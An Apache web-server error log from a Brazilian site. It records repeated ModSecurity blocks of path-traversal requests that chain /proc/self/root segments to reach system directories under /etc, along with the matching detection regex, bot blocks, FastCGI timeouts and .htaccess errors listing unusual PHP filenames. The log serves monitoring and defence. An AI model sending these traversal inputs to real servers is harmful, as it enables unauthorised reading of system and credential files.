[Wed Mar 18 01:42:05.199092 2026] [mime_magic:error] [pid 11816:tid 140411616036608] (70014)End of file found: [client 74.7.243.128:43462] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/systemd
[Wed Mar 18 01:42:05.199352 2026] [access_compat:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:43462] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/systemd
[Wed Mar 18 01:42:15.487456 2026] [mime_magic:error] [pid 11816:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:58476] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/libexec
[Wed Mar 18 01:42:15.487662 2026] [access_compat:error] [pid 11816:tid 140411733534464] [client 74.7.241.31:58476] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/libexec
[Wed Mar 18 01:42:19.139051 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:32790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotK-yqAr6etmhZHNpqYQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:42:26.137863 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53868] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:42:49.121814 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54242] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:42:58.681843 2026] [core:alert] [pid 19507:tid 140411674785536] [client 74.7.241.31:37050] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs
[Wed Mar 18 01:42:59.115047 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:53504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotU8df6f5d65gmYZSClQAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:43:11.133806 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54614] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:43:32.983429 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:56408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotdCmAPhZkrhU8w4kiHAAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:43:34.121861 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54922] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:43:56.121905 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55276] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:44:03.579992 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:48962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotkgkwaGbbGflqUZDGywAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:44:06.869942 2026] [core:alert] [pid 31803:tid 140411691570944] [client 74.7.243.128:48898] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/tuned
[Wed Mar 18 01:44:18.124441 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55570] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:44:40.121955 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55862] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:44:43.308985 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:44372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abotuwkwaGbbGflqUZDG3wAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:44:59.300338 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:54264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboty9a6ubjKNq_cu4ZI3QAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:45:02.260849 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56164] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:45:26.133839 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56514] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:45:33.900931 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:33666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abot7ew_le52K8_3pV2TIAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:45:35.583346 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.244.43:46900] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abot7-w_le52K8_3pV2TIQAAAhQ"]
[Wed Mar 18 01:45:49.133786 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57478] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:45:59.826671 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.228.61:37250] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abouB-yqAr6etmhZHNpqugAAAE8"]
[Wed Mar 18 01:46:06.101643 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:50734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouDta6ubjKNq_cu4ZJMwAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:46:12.133796 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57828] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:46:35.121221 2026] [proxy_fcgi:error] [pid 19507:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58122] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:46:47.566725 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:57076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouN9a6ubjKNq_cu4ZJcwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:46:52.863309 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.243.128:57746] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouPOw_le52K8_3pV2TNQAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:46:58.129776 2026] [proxy_fcgi:error] [pid 15051:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58462] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:47:07.007063 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:38522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouS9a6ubjKNq_cu4ZJgQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:47:21.130786 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58828] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:47:27.946022 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:58818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouX9Y0UrI5A3LftIxDVgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:47:43.123916 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59210] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:47:56.475210 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:36022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboufCmAPhZkrhU8w4kidQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:48:05.131108 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59536] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:48:08.508659 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:54982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abouiNa6ubjKNq_cu4ZJkwAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:48:28.653788 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59998] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:48:51.128887 2026] [proxy_fcgi:error] [pid 11816:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60388] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:48:53.820722 2026] [core:alert] [pid 17653:tid 140411616036608] [client 74.7.243.128:46206] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/udev
[Wed Mar 18 01:49:13.129835 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60708] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:49:35.133802 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:49:58.133799 2026] [proxy_fcgi:error] [pid 15051:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:50:20.529807 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33636] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:50:22.003084 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:54158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 